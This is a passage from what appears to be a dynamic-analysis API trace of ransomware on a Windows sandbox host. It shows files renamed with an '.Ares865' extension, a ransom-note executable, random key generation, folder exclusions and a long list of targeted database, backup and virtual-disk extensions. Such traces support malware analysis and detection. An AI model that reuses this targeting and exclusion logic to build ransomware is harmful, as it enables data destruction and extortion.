param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865") returned 266 [0106.071] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\acecache11.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\acecache11.lst.ares865"), dwFlags=0x1) returned 0 [0106.072] GetLastError () returned 0x3 [0106.072] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst MoveFileEx error 3\r\n") returned 287 [0106.072] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst MoveFileEx error 3\r\n") returned 287 [0106.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.073] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x744f [0106.073] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x11f, lpOverlapped=0x0) returned 1 [0106.073] CloseHandle (hObject=0x118) returned 1 [0106.073] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.073] CloseHandle (hObject=0x0) returned 0 [0106.073] CloseHandle (hObject=0x0) returned 0 [0106.073] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.073] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.073] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0106.073] lstrcmpiW (lpString1="Profiles", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.073] lstrcmpiW (lpString1="Profiles", lpString2="aoldtz.exe") returned 1 [0106.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865") returned 249 [0106.075] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\acecache11.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\acecache11.lst.ares865"), dwFlags=0x1) returned 1 [0106.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\acecache11.lst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1180) returned 1 [0106.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.079] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x124 [0106.082] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0106.083] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.084] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.084] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.084] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0106.084] lstrcmpiW (lpString1="Profiles", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="aoldtz.exe") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="windows") returned -1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="bootmgr") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="temp") returned -1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="pagefile.sys") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="boot") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="ids.txt") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="ntuser.dat") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="perflogs") returned 1 [0106.085] lstrcmpiW (lpString1="Profiles", lpString2="MSBuild") returned 1 [0106.085] lstrlenW (lpString="Profiles") returned 8 [0106.085] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst") returned 241 [0106.086] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.086] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.086] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.086] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.086] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.086] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.086] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.086] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.086] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4fee4640, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.086] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.086] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x102a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wscRGB.icc", cAlternateFileName="")) returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="aoldtz.exe") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2=".") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="..") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="windows") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="bootmgr") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="temp") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="pagefile.sys") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="boot") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="ids.txt") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="ntuser.dat") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="perflogs") returned 1 [0106.086] lstrcmpiW (lpString1="wscRGB.icc", lpString2="MSBuild") returned 1 [0106.086] lstrlenW (lpString="wscRGB.icc") returned 10 [0106.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*") returned 237 [0106.086] lstrcmpiW (lpString1="RGB.icc", lpString2="Ares865") returned 1 [0106.087] lstrlenW (lpString=".dll") returned 4 [0106.087] lstrcmpiW (lpString1="wscRGB.icc", lpString2=".dll") returned 1 [0106.087] lstrlenW (lpString=".lnk") returned 4 [0106.087] lstrcmpiW (lpString1="wscRGB.icc", lpString2=".lnk") returned 1 [0106.087] lstrlenW (lpString=".ini") returned 4 [0106.087] lstrcmpiW (lpString1="wscRGB.icc", lpString2=".ini") returned 1 [0106.087] lstrlenW (lpString=".sys") returned 4 [0106.087] lstrcmpiW (lpString1="wscRGB.icc", lpString2=".sys") returned 1 [0106.087] lstrlenW (lpString="wscRGB.icc") returned 10 [0106.087] lstrlenW (lpString="bak") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="bak") returned 1 [0106.087] lstrlenW (lpString="ba_") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="ba_") returned 1 [0106.087] lstrlenW (lpString="dbb") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="dbb") returned 1 [0106.087] lstrlenW (lpString="vmdk") returned 4 [0106.087] lstrcmpiW (lpString1=".icc", lpString2="vmdk") returned -1 [0106.087] lstrlenW (lpString="rar") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="rar") returned -1 [0106.087] lstrlenW (lpString="zip") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="zip") returned -1 [0106.087] lstrlenW (lpString="tgz") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="tgz") returned -1 [0106.087] lstrlenW (lpString="vbox") returned 4 [0106.087] lstrcmpiW (lpString1=".icc", lpString2="vbox") returned -1 [0106.087] lstrlenW (lpString="vdi") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="vdi") returned -1 [0106.087] lstrlenW (lpString="vhd") returned 3 [0106.087] lstrcmpiW (lpString1="icc", lpString2="vhd") returned -1 [0106.087] lstrlenW (lpString="vhdx") returned 4 [0106.087] lstrcmpiW (lpString1=".icc", lpString2="vhdx") returned -1 [0106.087] lstrlenW (lpString="avhd") returned 4 [0106.087] lstrcmpiW (lpString1=".icc", lpString2="avhd") returned -1 [0106.088] lstrlenW (lpString="db") returned 2 [0106.088] lstrcmpiW (lpString1="cc", lpString2="db") returned -1 [0106.088] lstrlenW (lpString="db2") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="db2") returned 1 [0106.088] lstrlenW (lpString="db3") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="db3") returned 1 [0106.088] lstrlenW (lpString="dbf") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="dbf") returned 1 [0106.088] lstrlenW (lpString="mdf") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="mdf") returned -1 [0106.088] lstrlenW (lpString="mdb") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="mdb") returned -1 [0106.088] lstrlenW (lpString="sql") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="sql") returned -1 [0106.088] lstrlenW (lpString="sqlite") returned 6 [0106.088] lstrcmpiW (lpString1="GB.icc", lpString2="sqlite") returned -1 [0106.088] lstrlenW (lpString="sqlite3") returned 7 [0106.088] lstrcmpiW (lpString1="RGB.icc", lpString2="sqlite3") returned -1 [0106.088] lstrlenW (lpString="sqlitedb") returned 8 [0106.088] lstrcmpiW (lpString1="cRGB.icc", lpString2="sqlitedb") returned -1 [0106.088] lstrlenW (lpString="xml") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="xml") returned -1 [0106.088] lstrlenW (lpString="$er") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="$er") returned 1 [0106.088] lstrlenW (lpString="4dd") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="4dd") returned 1 [0106.088] lstrlenW (lpString="4dl") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="4dl") returned 1 [0106.088] lstrlenW (lpString="^^^") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="^^^") returned 1 [0106.088] lstrlenW (lpString="abs") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="abs") returned 1 [0106.088] lstrlenW (lpString="abx") returned 3 [0106.088] lstrcmpiW (lpString1="icc", lpString2="abx") returned 1 [0106.089] lstrlenW (lpString="accdb") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accdb") returned 1 [0106.089] lstrlenW (lpString="accdc") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accdc") returned 1 [0106.089] lstrlenW (lpString="accde") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accde") returned 1 [0106.089] lstrlenW (lpString="accdr") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accdr") returned 1 [0106.089] lstrlenW (lpString="accdt") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accdt") returned 1 [0106.089] lstrlenW (lpString="accdw") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accdw") returned 1 [0106.089] lstrlenW (lpString="accft") returned 5 [0106.089] lstrcmpiW (lpString1="B.icc", lpString2="accft") returned 1 [0106.089] lstrlenW (lpString="adb") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="adb") returned 1 [0106.089] lstrlenW (lpString="adb") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="adb") returned 1 [0106.089] lstrlenW (lpString="ade") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="ade") returned 1 [0106.089] lstrlenW (lpString="adf") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="adf") returned 1 [0106.089] lstrlenW (lpString="adn") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="adn") returned 1 [0106.089] lstrlenW (lpString="adp") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="adp") returned 1 [0106.089] lstrlenW (lpString="alf") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="alf") returned 1 [0106.089] lstrlenW (lpString="ask") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="ask") returned 1 [0106.089] lstrlenW (lpString="btr") returned 3 [0106.089] lstrcmpiW (lpString1="icc", lpString2="btr") returned 1 [0106.089] lstrlenW (lpString="cat") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="cat") returned 1 [0106.090] lstrlenW (lpString="cdb") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="cdb") returned 1 [0106.090] lstrlenW (lpString="ckp") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="ckp") returned 1 [0106.090] lstrlenW (lpString="cma") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="cma") returned 1 [0106.090] lstrlenW (lpString="cpd") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="cpd") returned 1 [0106.090] lstrlenW (lpString="dacpac") returned 6 [0106.090] lstrcmpiW (lpString1="GB.icc", lpString2="dacpac") returned 1 [0106.090] lstrlenW (lpString="dad") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dad") returned 1 [0106.090] lstrlenW (lpString="dadiagrams") returned 10 [0106.090] lstrlenW (lpString="daschema") returned 8 [0106.090] lstrcmpiW (lpString1="cRGB.icc", lpString2="daschema") returned -1 [0106.090] lstrlenW (lpString="db-journal") returned 10 [0106.090] lstrlenW (lpString="db-shm") returned 6 [0106.090] lstrcmpiW (lpString1="GB.icc", lpString2="db-shm") returned 1 [0106.090] lstrlenW (lpString="db-wal") returned 6 [0106.090] lstrcmpiW (lpString1="GB.icc", lpString2="db-wal") returned 1 [0106.090] lstrlenW (lpString="dbc") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dbc") returned 1 [0106.090] lstrlenW (lpString="dbs") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dbs") returned 1 [0106.090] lstrlenW (lpString="dbt") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dbt") returned 1 [0106.090] lstrlenW (lpString="dbv") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dbv") returned 1 [0106.090] lstrlenW (lpString="dbx") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dbx") returned 1 [0106.090] lstrlenW (lpString="dcb") returned 3 [0106.090] lstrcmpiW (lpString1="icc", lpString2="dcb") returned 1 [0106.091] lstrlenW (lpString="dct") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dct") returned 1 [0106.091] lstrlenW (lpString="dcx") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dcx") returned 1 [0106.091] lstrlenW (lpString="ddl") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="ddl") returned 1 [0106.091] lstrlenW (lpString="dlis") returned 4 [0106.091] lstrcmpiW (lpString1=".icc", lpString2="dlis") returned -1 [0106.091] lstrlenW (lpString="dp1") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dp1") returned 1 [0106.091] lstrlenW (lpString="dqy") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dqy") returned 1 [0106.091] lstrlenW (lpString="dsk") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dsk") returned 1 [0106.091] lstrlenW (lpString="dsn") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dsn") returned 1 [0106.091] lstrlenW (lpString="dtsx") returned 4 [0106.091] lstrcmpiW (lpString1=".icc", lpString2="dtsx") returned -1 [0106.091] lstrlenW (lpString="dxl") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="dxl") returned 1 [0106.091] lstrlenW (lpString="eco") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="eco") returned 1 [0106.091] lstrlenW (lpString="ecx") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="ecx") returned 1 [0106.091] lstrlenW (lpString="edb") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="edb") returned 1 [0106.091] lstrlenW (lpString="epim") returned 4 [0106.091] lstrcmpiW (lpString1=".icc", lpString2="epim") returned -1 [0106.091] lstrlenW (lpString="fcd") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="fcd") returned 1 [0106.091] lstrlenW (lpString="fdb") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="fdb") returned 1 [0106.091] lstrlenW (lpString="fic") returned 3 [0106.091] lstrcmpiW (lpString1="icc", lpString2="fic") returned 1 [0106.091] lstrlenW (lpString="flexolibrary") returned 12 [0106.092] lstrlenW (lpString="fm5") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fm5") returned 1 [0106.092] lstrlenW (lpString="fmp") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fmp") returned 1 [0106.092] lstrlenW (lpString="fmp12") returned 5 [0106.092] lstrcmpiW (lpString1="B.icc", lpString2="fmp12") returned -1 [0106.092] lstrlenW (lpString="fmpsl") returned 5 [0106.092] lstrcmpiW (lpString1="B.icc", lpString2="fmpsl") returned -1 [0106.092] lstrlenW (lpString="fol") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fol") returned 1 [0106.092] lstrlenW (lpString="fp3") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fp3") returned 1 [0106.092] lstrlenW (lpString="fp4") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fp4") returned 1 [0106.092] lstrlenW (lpString="fp5") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fp5") returned 1 [0106.092] lstrlenW (lpString="fp7") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fp7") returned 1 [0106.092] lstrlenW (lpString="fpt") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="fpt") returned 1 [0106.092] lstrlenW (lpString="frm") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="frm") returned 1 [0106.092] lstrlenW (lpString="gdb") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="gdb") returned 1 [0106.092] lstrlenW (lpString="gdb") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="gdb") returned 1 [0106.092] lstrlenW (lpString="grdb") returned 4 [0106.092] lstrcmpiW (lpString1=".icc", lpString2="grdb") returned -1 [0106.092] lstrlenW (lpString="gwi") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="gwi") returned 1 [0106.092] lstrlenW (lpString="hdb") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="hdb") returned 1 [0106.092] lstrlenW (lpString="his") returned 3 [0106.092] lstrcmpiW (lpString1="icc", lpString2="his") returned 1 [0106.092] lstrlenW (lpString="ib") returned 2 [0106.093] lstrcmpiW (lpString1="cc", lpString2="ib") returned -1 [0106.093] lstrlenW (lpString="idb") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="idb") returned -1 [0106.093] lstrlenW (lpString="ihx") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="ihx") returned -1 [0106.093] lstrlenW (lpString="itdb") returned 4 [0106.093] lstrcmpiW (lpString1=".icc", lpString2="itdb") returned -1 [0106.093] lstrlenW (lpString="itw") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="itw") returned -1 [0106.093] lstrlenW (lpString="jet") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="jet") returned -1 [0106.093] lstrlenW (lpString="jtx") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="jtx") returned -1 [0106.093] lstrlenW (lpString="kdb") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="kdb") returned -1 [0106.093] lstrlenW (lpString="kexi") returned 4 [0106.093] lstrcmpiW (lpString1=".icc", lpString2="kexi") returned -1 [0106.093] lstrlenW (lpString="kexic") returned 5 [0106.093] lstrcmpiW (lpString1="B.icc", lpString2="kexic") returned -1 [0106.093] lstrlenW (lpString="kexis") returned 5 [0106.093] lstrcmpiW (lpString1="B.icc", lpString2="kexis") returned -1 [0106.093] lstrlenW (lpString="lgc") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="lgc") returned -1 [0106.093] lstrlenW (lpString="lwx") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="lwx") returned -1 [0106.093] lstrlenW (lpString="maf") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="maf") returned -1 [0106.093] lstrlenW (lpString="maq") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="maq") returned -1 [0106.093] lstrlenW (lpString="mar") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="mar") returned -1 [0106.093] lstrlenW (lpString="marshal") returned 7 [0106.093] lstrcmpiW (lpString1="RGB.icc", lpString2="marshal") 